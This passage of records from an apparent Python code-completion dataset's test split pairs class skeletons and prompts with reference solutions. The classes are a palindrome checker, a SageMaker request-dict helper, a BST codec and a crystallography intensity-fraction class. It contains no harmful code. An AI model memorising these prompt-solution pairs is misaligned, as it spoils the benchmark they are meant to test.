"9601099aeb23c6effaa1c726a3cd6e6a0d2e52be", "bodies": ["if x < 0:\n return False\nif x 
< 10:\n return True\nl = []\nl.append(x % 10)\nx //= 10\nwhile x != 0:\n l.append(x % 10)\n x //= 10\nleft = 0\nright = len(l) - 1\nwhile left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\nreturn True", "if x < 0:\n return False\nl = list(str(x))\nn = len(l)\nif n == 1:\n return True\nleft = 0\nright = len(l) - 1\nwhile left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\nreturn True"], "bodies_text": "<|body_start_0|>\n if x < 0:\n return False\n if x < 10:\n return True\n l = []\n l.append(x % 10)\n x //= 10\n while x != 0:\n l.append(x % 10)\n x //= 10\n left = 0\n right = len(l) - 1\n while left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if x < 0:\n return False\n l = list(str(x))\n n = len(l)\n if n == 1:\n return True\n left = 0\n right = len(l) - 1\n while left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def isPalindrome(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n <|body_0|>\n\n def isPalindrome0(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if x < 0:\n return False\n if x < 10:\n return True\n l = []\n l.append(x % 10)\n x //= 10\n while x != 0:\n l.append(x % 10)\n x //= 10\n left = 0\n right = len(l) - 1\n while left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if x < 0:\n return False\n l = list(str(x))\n n = len(l)\n if n == 1:\n return True\n left = 0\n right = len(l) - 1\n while left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000213", "length_bytes": 1118, "license_type": "no_license", "methods": [{"docstring": ":type x: int :rtype: bool", "name": "isPalindrome", "signature": "def isPalindrome(self, x)"}, {"docstring": ":type x: int :rtype: bool", "name": "isPalindrome0", "signature": "def isPalindrome0(self, x)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def isPalindrome(self, x): :type x: int :rtype: bool\n- def isPalindrome0(self, x): :type x: int :rtype: bool", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def isPalindrome(self, x): :type x: int :rtype: bool\n- def isPalindrome0(self, x): :type x: int :rtype: bool\n\n<|skeleton|>\nclass Solution:\n\n def isPalindrome(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n <|body_0|>\n\n def isPalindrome0(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if x < 0:\n return False\n if x < 10:\n return True\n l = []\n l.append(x % 10)\n x //= 10\n while x != 0:\n l.append(x % 10)\n x //= 10\n left = 0\n right = len(l) - 1\n while left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if x < 0:\n return False\n l = list(str(x))\n n = len(l)\n if n == 1:\n return True\n left = 0\n right = len(l) - 1\n while left 
<= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n<|end_body_1|>\n", "revision_id": "6e18c5d257840489cc3fb1079ae3804c743982a4", "skeleton": "<|skeleton|>\nclass Solution:\n\n def isPalindrome(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n <|body_0|>\n\n def isPalindrome0(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def isPalindrome(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n if x < 0:\n return False\n if x < 10:\n return True\n l = []\n l.append(x % 10)\n x //= 10\n while x != 0:\n l.append(x % 10)\n x //= 10\n left = 0\n right = len(l) - 1\n while left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n\n def isPalindrome0(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n if x < 0:\n return False\n l = list(str(x))\n n = len(l)\n if n == 1:\n return True\n left = 0\n right = len(l) - 1\n while left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n", "source": "the_stack_v2_python_sparse", "source_path": "9.回文数.py", "source_repo": "yangyuxiang1996/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "0999d53004b338a7f628448d206e02e93949c757", "bodies": ["if name.startswith('_') and hasattr(self, name[1:]):\n name = name[1:]\nreturn name", "if attr in self.__class__.__dict__:\n return isinstance(self.__class__.__dict__[attr], _SkipEncodingDecoding)\nreturn False", "request_data = {}\nfor attr, value in self.__dict__.items():\n if value is not None:\n name = self._clean_descriptor_name(attr)\n if not self._skip_encoding(name):\n request_data[name] = value\nreturn request_data"], "bodies_text": "<|body_start_0|>\n if name.startswith('_') and hasattr(self, name[1:]):\n name = name[1:]\n return name\n<|end_body_0|>\n\n<|body_start_1|>\n if attr in self.__class__.__dict__:\n return isinstance(self.__class__.__dict__[attr], _SkipEncodingDecoding)\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n request_data = {}\n for attr, value in self.__dict__.items():\n if value is not None:\n name = self._clean_descriptor_name(attr)\n if not self._skip_encoding(name):\n request_data[name] = value\n return request_data\n<|end_body_2|>\n", "class_docstring": "Provide a default behavior for to_request_dict method.", "class_name": "_DefaultToRequestDict", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass _DefaultToRequestDict:\n \"\"\"Provide a default behavior for to_request_dict method.\"\"\"\n\n def _clean_descriptor_name(self, name: str):\n \"\"\"Update the attribute name to be the same as schema. 
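Both palindrome methods in the record above materialize every digit, into a list or a string. A common refinement — not part of the original solutions — reverses only the lower half of the number arithmetically and compares it with what remains, halving the digit work:

# Half-reversal palindrome check: peel digits off the right into `rev`
# until rev catches up with what is left of x.
def is_palindrome_half(x: int) -> bool:
    # negatives and nonzero multiples of 10 can never be palindromes
    if x < 0 or (x % 10 == 0 and x != 0):
        return False
    rev = 0
    while x > rev:
        rev = rev * 10 + x % 10
        x //= 10
    # even digit count: x == rev; odd: the middle digit sits in rev's last place
    return x == rev or x == rev // 10

for n in (121, 1221, 10, 0, 123):
    print(n, is_palindrome_half(n))  # True, True, False, True, False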
Args: name (str): attribute name.\"\"\"\n <|body_0|>\n\n def _skip_encoding(self, attr: str):\n \"\"\"Skip encoding if the attribute is an instance of _SkipEncodingDecoding descriptor\"\"\"\n <|body_1|>\n\n def _to_request_dict(self):\n \"\"\"Implement this method in a subclass to return a custom request_dict.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if name.startswith('_') and hasattr(self, name[1:]):\n name = name[1:]\n return name\n<|end_body_0|>\n\n<|body_start_1|>\n if attr in self.__class__.__dict__:\n return isinstance(self.__class__.__dict__[attr], _SkipEncodingDecoding)\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n request_data = {}\n for attr, value in self.__dict__.items():\n if value is not None:\n name = self._clean_descriptor_name(attr)\n if not self._skip_encoding(name):\n request_data[name] = value\n return request_data\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000214", "length_bytes": 16025, "license_type": "permissive", "methods": [{"docstring": "Update the attribute name to be the same as schema. Args: name (str): attribute name.", "name": "_clean_descriptor_name", "signature": "def _clean_descriptor_name(self, name: str)"}, {"docstring": "Skip encoding if the attribute is an instance of _SkipEncodingDecoding descriptor", "name": "_skip_encoding", "signature": "def _skip_encoding(self, attr: str)"}, {"docstring": "Implement this method in a subclass to return a custom request_dict.", "name": "_to_request_dict", "signature": "def _to_request_dict(self)"}], "n_methods": 3, "prompt": "Implement the Python class `_DefaultToRequestDict` described below.\n\nClass description:\nProvide a default behavior for to_request_dict method.\n\nMethod signatures and docstrings:\n- def _clean_descriptor_name(self, name: str): Update the attribute name to be the same as schema. Args: name (str): attribute name.\n- def _skip_encoding(self, attr: str): Skip encoding if the attribute is an instance of _SkipEncodingDecoding descriptor\n- def _to_request_dict(self): Implement this method in a subclass to return a custom request_dict.", "prompted_full_text": "Implement the Python class `_DefaultToRequestDict` described below.\n\nClass description:\nProvide a default behavior for to_request_dict method.\n\nMethod signatures and docstrings:\n- def _clean_descriptor_name(self, name: str): Update the attribute name to be the same as schema. Args: name (str): attribute name.\n- def _skip_encoding(self, attr: str): Skip encoding if the attribute is an instance of _SkipEncodingDecoding descriptor\n- def _to_request_dict(self): Implement this method in a subclass to return a custom request_dict.\n\n<|skeleton|>\nclass _DefaultToRequestDict:\n \"\"\"Provide a default behavior for to_request_dict method.\"\"\"\n\n def _clean_descriptor_name(self, name: str):\n \"\"\"Update the attribute name to be the same as schema. 
Args: name (str): attribute name.\"\"\"\n <|body_0|>\n\n def _skip_encoding(self, attr: str):\n \"\"\"Skip encoding if the attribute is an instance of _SkipEncodingDecoding descriptor\"\"\"\n <|body_1|>\n\n def _to_request_dict(self):\n \"\"\"Implement this method in a subclass to return a custom request_dict.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if name.startswith('_') and hasattr(self, name[1:]):\n name = name[1:]\n return name\n<|end_body_0|>\n\n<|body_start_1|>\n if attr in self.__class__.__dict__:\n return isinstance(self.__class__.__dict__[attr], _SkipEncodingDecoding)\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n request_data = {}\n for attr, value in self.__dict__.items():\n if value is not None:\n name = self._clean_descriptor_name(attr)\n if not self._skip_encoding(name):\n request_data[name] = value\n return request_data\n<|end_body_2|>\n", "revision_id": "8d5d7fd8ae1a917ed3e2b988d5e533bce244fd85", "skeleton": "<|skeleton|>\nclass _DefaultToRequestDict:\n \"\"\"Provide a default behavior for to_request_dict method.\"\"\"\n\n def _clean_descriptor_name(self, name: str):\n \"\"\"Update the attribute name to be the same as schema. Args: name (str): attribute name.\"\"\"\n <|body_0|>\n\n def _skip_encoding(self, attr: str):\n \"\"\"Skip encoding if the attribute is an instance of _SkipEncodingDecoding descriptor\"\"\"\n <|body_1|>\n\n def _to_request_dict(self):\n \"\"\"Implement this method in a subclass to return a custom request_dict.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class _DefaultToRequestDict:\n \"\"\"Provide a default behavior for to_request_dict method.\"\"\"\n\n def _clean_descriptor_name(self, name: str):\n \"\"\"Update the attribute name to be the same as schema. 
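The three _DefaultToRequestDict bodies above cooperate so that an attribute stored by a descriptor under a leading-underscore slot is reported under its public name, and any attribute whose class-level descriptor is a _SkipEncodingDecoding instance is omitted from the request dict. A runnable sketch under an assumed stub descriptor (the real _SkipEncodingDecoding lives in the SDK this record was mined from; the stub, the Card class, and its field names are mine):

class _SkipEncodingDecoding:
    """Stand-in descriptor, not the SDK's: stores the value on a _name slot."""
    def __set_name__(self, owner, name):
        self._slot = "_" + name
    def __get__(self, obj, objtype=None):
        return getattr(obj, self._slot, None)
    def __set__(self, obj, value):
        setattr(obj, self._slot, value)

class _DefaultToRequestDict:
    def _clean_descriptor_name(self, name: str):
        # "_secret" becomes "secret" when a public attribute of that name exists.
        if name.startswith("_") and hasattr(self, name[1:]):
            name = name[1:]
        return name
    def _skip_encoding(self, attr: str):
        if attr in self.__class__.__dict__:
            return isinstance(self.__class__.__dict__[attr], _SkipEncodingDecoding)
        return False
    def _to_request_dict(self):
        request_data = {}
        for attr, value in self.__dict__.items():
            if value is not None:
                name = self._clean_descriptor_name(attr)
                if not self._skip_encoding(name):
                    request_data[name] = value
        return request_data

class Card(_DefaultToRequestDict):
    secret = _SkipEncodingDecoding()  # stored as _secret, excluded from the dict
    def __init__(self):
        self.name = "demo"
        self.secret = "hidden"
        self.empty = None             # None values are dropped

print(Card()._to_request_dict())

This prints {'name': 'demo'}: _secret is renamed to secret, recognised as skip-encoded, and dropped, while empty is dropped for being None.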
Args: name (str): attribute name.\"\"\"\n if name.startswith('_') and hasattr(self, name[1:]):\n name = name[1:]\n return name\n\n def _skip_encoding(self, attr: str):\n \"\"\"Skip encoding if the attribute is an instance of _SkipEncodingDecoding descriptor\"\"\"\n if attr in self.__class__.__dict__:\n return isinstance(self.__class__.__dict__[attr], _SkipEncodingDecoding)\n return False\n\n def _to_request_dict(self):\n \"\"\"Implement this method in a subclass to return a custom request_dict.\"\"\"\n request_data = {}\n for attr, value in self.__dict__.items():\n if value is not None:\n name = self._clean_descriptor_name(attr)\n if not self._skip_encoding(name):\n request_data[name] = value\n return request_data\n", "source": "the_stack_v2_python_sparse", "source_path": "src/sagemaker/model_card/helpers.py", "source_repo": "aws/sagemaker-python-sdk", "split": "test", "star_events_count": 2050} {"blob_id": "fd8fc14510a0d3184fb16bc9cb5dba0dac443f25", "bodies": ["def helper(cur):\n if not cur:\n return\n ans.append(cur.val)\n helper(cur.left)\n helper(cur.right)\n return ans\nans = []\nhelper(root)\nreturn ','.join([str(elem) for elem in ans])", "def helper(target, cur):\n if not cur:\n return TreeNode(target)\n elif target < cur.val:\n cur.left = helper(target, cur.left)\n elif target > cur.val:\n cur.right = helper(target, cur.right)\n return cur\nif not data:\n return None\ndata = data.split(',')\ndata = [int(elem) for elem in data]\nroot = TreeNode(data[0])\nfor i in range(1, len(data)):\n helper(data[i], root)\nreturn root"], "bodies_text": "<|body_start_0|>\n def helper(cur):\n if not cur:\n return\n ans.append(cur.val)\n helper(cur.left)\n helper(cur.right)\n return ans\n ans = []\n helper(root)\n return ','.join([str(elem) for elem in ans])\n<|end_body_0|>\n\n<|body_start_1|>\n def helper(target, cur):\n if not cur:\n return TreeNode(target)\n elif target < cur.val:\n cur.left = helper(target, cur.left)\n elif target > cur.val:\n cur.right = helper(target, cur.right)\n return cur\n if not data:\n return None\n data = data.split(',')\n data = [int(elem) for elem in data]\n root = TreeNode(data[0])\n for i in range(1, len(data)):\n helper(data[i], root)\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> TreeNode:\n \"\"\"Decodes your encoded data to tree.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def helper(cur):\n if not cur:\n return\n ans.append(cur.val)\n helper(cur.left)\n helper(cur.right)\n return ans\n ans = []\n helper(root)\n return ','.join([str(elem) for elem in ans])\n<|end_body_0|>\n\n<|body_start_1|>\n def helper(target, cur):\n if not cur:\n return TreeNode(target)\n elif target < cur.val:\n cur.left = helper(target, cur.left)\n elif target > cur.val:\n cur.right = helper(target, cur.right)\n return cur\n if not data:\n return None\n data = data.split(',')\n data = [int(elem) for elem in data]\n root = TreeNode(data[0])\n for i in range(1, len(data)):\n helper(data[i], root)\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000215", "length_bytes": 5056, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string.", "name": "serialize", "signature": "def serialize(self, root: TreeNode) -> str"}, 
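On the Codec record beginning above: serialize emits a preorder listing of the values, and because the tree is a binary search tree, deserialize can rebuild it by reinserting each value with ordinary BST insertion. A restructured but behaviour-equivalent sketch with a round-trip check (the TreeNode definition and the sample values are mine, not from the record):

class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

class Codec:
    def serialize(self, root):
        # Preorder traversal; for a BST this alone determines the tree.
        out = []
        def walk(node):
            if node:
                out.append(str(node.val))
                walk(node.left)
                walk(node.right)
        walk(root)
        return ",".join(out)

    def deserialize(self, data):
        if not data:
            return None
        def insert(node, val):
            # Standard BST insertion; preorder guarantees parents come first.
            if node is None:
                return TreeNode(val)
            if val < node.val:
                node.left = insert(node.left, val)
            elif val > node.val:
                node.right = insert(node.right, val)
            return node
        vals = [int(v) for v in data.split(",")]
        root = TreeNode(vals[0])
        for v in vals[1:]:
            insert(root, v)
        return root

codec = Codec()
root = codec.deserialize("5,3,1,4,8")
print(codec.serialize(root))  # 5,3,1,4,8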
{"docstring": "Decodes your encoded data to tree.", "name": "deserialize", "signature": "def deserialize(self, data: str) -> TreeNode"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: TreeNode) -> str: Encodes a tree to a single string.\n- def deserialize(self, data: str) -> TreeNode: Decodes your encoded data to tree.", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: TreeNode) -> str: Encodes a tree to a single string.\n- def deserialize(self, data: str) -> TreeNode: Decodes your encoded data to tree.\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> TreeNode:\n \"\"\"Decodes your encoded data to tree.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def helper(cur):\n if not cur:\n return\n ans.append(cur.val)\n helper(cur.left)\n helper(cur.right)\n return ans\n ans = []\n helper(root)\n return ','.join([str(elem) for elem in ans])\n<|end_body_0|>\n\n<|body_start_1|>\n def helper(target, cur):\n if not cur:\n return TreeNode(target)\n elif target < cur.val:\n cur.left = helper(target, cur.left)\n elif target > cur.val:\n cur.right = helper(target, cur.right)\n return cur\n if not data:\n return None\n data = data.split(',')\n data = [int(elem) for elem in data]\n root = TreeNode(data[0])\n for i in range(1, len(data)):\n helper(data[i], root)\n return root\n<|end_body_1|>\n", "revision_id": "1abc28919abb55b93d3879860ac9c1297d493d09", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> TreeNode:\n \"\"\"Decodes your encoded data to tree.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\"\"\"\n def helper(cur):\n if not cur:\n return\n ans.append(cur.val)\n helper(cur.left)\n helper(cur.right)\n return ans\n ans = []\n helper(root)\n return ','.join([str(elem) for elem in ans])\n\n def deserialize(self, data: str) -> TreeNode:\n \"\"\"Decodes your encoded data to tree.\"\"\"\n def helper(target, cur):\n if not cur:\n return TreeNode(target)\n elif target < cur.val:\n cur.left = helper(target, cur.left)\n elif target > cur.val:\n cur.right = helper(target, cur.right)\n return cur\n if not data:\n return None\n data = data.split(',')\n data = [int(elem) for elem in data]\n root = TreeNode(data[0])\n for i in range(1, len(data)):\n helper(data[i], root)\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "lc/449.SerializeAndDeserializeBST.py", "source_repo": "akimi-yano/algorithm-practice", "split": "test", "star_events_count": 0} {"blob_id": "48e6e50a51cd078c1bb44c6d184d1b990277dae5", "bodies": ["dphi2 = scan.get_oscillation(deg=False)[1] / 2.0\ntau, zeta = self._calculate_tau_and_zeta(crystal, beam, detector, goniometer, scan, reflections)\nself.e1 = (tau + dphi2) * flex.abs(zeta) / math.sqrt(2.0)\nself.e2 = (tau - dphi2) * flex.abs(zeta) / math.sqrt(2.0)", "from dials.algorithms.shoebox import 
MaskCode\nmask_code = MaskCode.Valid | MaskCode.Foreground\nsbox = reflections['shoebox']\nbbox = reflections['bbox']\nphi = reflections['xyzcal.mm'].parts()[2]\nzeta = reflections['zeta']\ntau = []\nzeta2 = []\nfor s, b, p, z in zip(sbox, bbox, phi, zeta):\n for z0, f in enumerate(range(b[4], b[5])):\n phi0 = scan.get_angle_from_array_index(int(f), deg=False)\n phi1 = scan.get_angle_from_array_index(int(f) + 1, deg=False)\n m = s.mask[z0:z0 + 1, :, :]\n if m.count(mask_code) > 0:\n tau.append((phi1 + phi0) / 2.0 - p)\n zeta2.append(z)\nreturn (flex.double(tau), flex.double(zeta2))", "TINY = 1e-10\nassert sigma_m > TINY\na = scitbx.math.erf(self.e1 / sigma_m)\nb = scitbx.math.erf(self.e2 / sigma_m)\nR = (a - b) / 2.0\nassert R.all_ge(0)\nmask = R < TINY\nassert mask.count(True) < len(mask)\nR.set_selected(mask, TINY)\nreturn flex.log(R)"], "bodies_text": "<|body_start_0|>\n dphi2 = scan.get_oscillation(deg=False)[1] / 2.0\n tau, zeta = self._calculate_tau_and_zeta(crystal, beam, detector, goniometer, scan, reflections)\n self.e1 = (tau + dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n self.e2 = (tau - dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n<|end_body_0|>\n\n<|body_start_1|>\n from dials.algorithms.shoebox import MaskCode\n mask_code = MaskCode.Valid | MaskCode.Foreground\n sbox = reflections['shoebox']\n bbox = reflections['bbox']\n phi = reflections['xyzcal.mm'].parts()[2]\n zeta = reflections['zeta']\n tau = []\n zeta2 = []\n for s, b, p, z in zip(sbox, bbox, phi, zeta):\n for z0, f in enumerate(range(b[4], b[5])):\n phi0 = scan.get_angle_from_array_index(int(f), deg=False)\n phi1 = scan.get_angle_from_array_index(int(f) + 1, deg=False)\n m = s.mask[z0:z0 + 1, :, :]\n if m.count(mask_code) > 0:\n tau.append((phi1 + phi0) / 2.0 - p)\n zeta2.append(z)\n return (flex.double(tau), flex.double(zeta2))\n<|end_body_1|>\n\n<|body_start_2|>\n TINY = 1e-10\n assert sigma_m > TINY\n a = scitbx.math.erf(self.e1 / sigma_m)\n b = scitbx.math.erf(self.e2 / sigma_m)\n R = (a - b) / 2.0\n assert R.all_ge(0)\n mask = R < TINY\n assert mask.count(True) < len(mask)\n R.set_selected(mask, TINY)\n return flex.log(R)\n<|end_body_2|>\n", "class_docstring": "Calculate the fraction of observed intensity for different sigma_m.", "class_name": "FractionOfObservedIntensity", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FractionOfObservedIntensity:\n \"\"\"Calculate the fraction of observed intensity for different sigma_m.\"\"\"\n\n def __init__(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Initialise the algorithm. Calculate the list of tau and zetas. Params: reflections The list of reflections experiment The experiment object\"\"\"\n <|body_0|>\n\n def _calculate_tau_and_zeta(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Calculate the list of tau and zeta needed for the calculation. Params: reflections The list of reflections experiment The experiment object. Returns: (list of tau, list of zeta)\"\"\"\n <|body_1|>\n\n def __call__(self, sigma_m):\n \"\"\"Calculate the fraction of observed intensity for each observation. 
Params: sigma_m The mosaicity Returns: A list of log intensity fractions\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n dphi2 = scan.get_oscillation(deg=False)[1] / 2.0\n tau, zeta = self._calculate_tau_and_zeta(crystal, beam, detector, goniometer, scan, reflections)\n self.e1 = (tau + dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n self.e2 = (tau - dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n<|end_body_0|>\n\n<|body_start_1|>\n from dials.algorithms.shoebox import MaskCode\n mask_code = MaskCode.Valid | MaskCode.Foreground\n sbox = reflections['shoebox']\n bbox = reflections['bbox']\n phi = reflections['xyzcal.mm'].parts()[2]\n zeta = reflections['zeta']\n tau = []\n zeta2 = []\n for s, b, p, z in zip(sbox, bbox, phi, zeta):\n for z0, f in enumerate(range(b[4], b[5])):\n phi0 = scan.get_angle_from_array_index(int(f), deg=False)\n phi1 = scan.get_angle_from_array_index(int(f) + 1, deg=False)\n m = s.mask[z0:z0 + 1, :, :]\n if m.count(mask_code) > 0:\n tau.append((phi1 + phi0) / 2.0 - p)\n zeta2.append(z)\n return (flex.double(tau), flex.double(zeta2))\n<|end_body_1|>\n\n<|body_start_2|>\n TINY = 1e-10\n assert sigma_m > TINY\n a = scitbx.math.erf(self.e1 / sigma_m)\n b = scitbx.math.erf(self.e2 / sigma_m)\n R = (a - b) / 2.0\n assert R.all_ge(0)\n mask = R < TINY\n assert mask.count(True) < len(mask)\n R.set_selected(mask, TINY)\n return flex.log(R)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000216", "length_bytes": 27074, "license_type": "permissive", "methods": [{"docstring": "Initialise the algorithm. Calculate the list of tau and zetas. Params: reflections The list of reflections experiment The experiment object", "name": "__init__", "signature": "def __init__(self, crystal, beam, detector, goniometer, scan, reflections)"}, {"docstring": "Calculate the list of tau and zeta needed for the calculation. Params: reflections The list of reflections experiment The experiment object. Returns: (list of tau, list of zeta)", "name": "_calculate_tau_and_zeta", "signature": "def _calculate_tau_and_zeta(self, crystal, beam, detector, goniometer, scan, reflections)"}, {"docstring": "Calculate the fraction of observed intensity for each observation. Params: sigma_m The mosaicity Returns: A list of log intensity fractions", "name": "__call__", "signature": "def __call__(self, sigma_m)"}], "n_methods": 3, "prompt": "Implement the Python class `FractionOfObservedIntensity` described below.\n\nClass description:\nCalculate the fraction of observed intensity for different sigma_m.\n\nMethod signatures and docstrings:\n- def __init__(self, crystal, beam, detector, goniometer, scan, reflections): Initialise the algorithm. Calculate the list of tau and zetas. Params: reflections The list of reflections experiment The experiment object\n- def _calculate_tau_and_zeta(self, crystal, beam, detector, goniometer, scan, reflections): Calculate the list of tau and zeta needed for the calculation. Params: reflections The list of reflections experiment The experiment object. Returns: (list of tau, list of zeta)\n- def __call__(self, sigma_m): Calculate the fraction of observed intensity for each observation. 
Params: sigma_m The mosaicity Returns: A list of log intensity fractions", "prompted_full_text": "Implement the Python class `FractionOfObservedIntensity` described below.\n\nClass description:\nCalculate the fraction of observed intensity for different sigma_m.\n\nMethod signatures and docstrings:\n- def __init__(self, crystal, beam, detector, goniometer, scan, reflections): Initialise the algorithm. Calculate the list of tau and zetas. Params: reflections The list of reflections experiment The experiment object\n- def _calculate_tau_and_zeta(self, crystal, beam, detector, goniometer, scan, reflections): Calculate the list of tau and zeta needed for the calculation. Params: reflections The list of reflections experiment The experiment object. Returns: (list of tau, list of zeta)\n- def __call__(self, sigma_m): Calculate the fraction of observed intensity for each observation. Params: sigma_m The mosaicity Returns: A list of log intensity fractions\n\n<|skeleton|>\nclass FractionOfObservedIntensity:\n \"\"\"Calculate the fraction of observed intensity for different sigma_m.\"\"\"\n\n def __init__(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Initialise the algorithm. Calculate the list of tau and zetas. Params: reflections The list of reflections experiment The experiment object\"\"\"\n <|body_0|>\n\n def _calculate_tau_and_zeta(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Calculate the list of tau and zeta needed for the calculation. Params: reflections The list of reflections experiment The experiment object. Returns: (list of tau, list of zeta)\"\"\"\n <|body_1|>\n\n def __call__(self, sigma_m):\n \"\"\"Calculate the fraction of observed intensity for each observation. Params: sigma_m The mosaicity Returns: A list of log intensity fractions\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n dphi2 = scan.get_oscillation(deg=False)[1] / 2.0\n tau, zeta = self._calculate_tau_and_zeta(crystal, beam, detector, goniometer, scan, reflections)\n self.e1 = (tau + dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n self.e2 = (tau - dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n<|end_body_0|>\n\n<|body_start_1|>\n from dials.algorithms.shoebox import MaskCode\n mask_code = MaskCode.Valid | MaskCode.Foreground\n sbox = reflections['shoebox']\n bbox = reflections['bbox']\n phi = reflections['xyzcal.mm'].parts()[2]\n zeta = reflections['zeta']\n tau = []\n zeta2 = []\n for s, b, p, z in zip(sbox, bbox, phi, zeta):\n for z0, f in enumerate(range(b[4], b[5])):\n phi0 = scan.get_angle_from_array_index(int(f), deg=False)\n phi1 = scan.get_angle_from_array_index(int(f) + 1, deg=False)\n m = s.mask[z0:z0 + 1, :, :]\n if m.count(mask_code) > 0:\n tau.append((phi1 + phi0) / 2.0 - p)\n zeta2.append(z)\n return (flex.double(tau), flex.double(zeta2))\n<|end_body_1|>\n\n<|body_start_2|>\n TINY = 1e-10\n assert sigma_m > TINY\n a = scitbx.math.erf(self.e1 / sigma_m)\n b = scitbx.math.erf(self.e2 / sigma_m)\n R = (a - b) / 2.0\n assert R.all_ge(0)\n mask = R < TINY\n assert mask.count(True) < len(mask)\n R.set_selected(mask, TINY)\n return flex.log(R)\n<|end_body_2|>\n", "revision_id": "88bf7f7c5ac44defc046ebf0719cde748092cfff", "skeleton": "<|skeleton|>\nclass FractionOfObservedIntensity:\n \"\"\"Calculate the fraction of observed intensity for different sigma_m.\"\"\"\n\n def __init__(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Initialise the algorithm. Calculate the list of tau and zetas. 
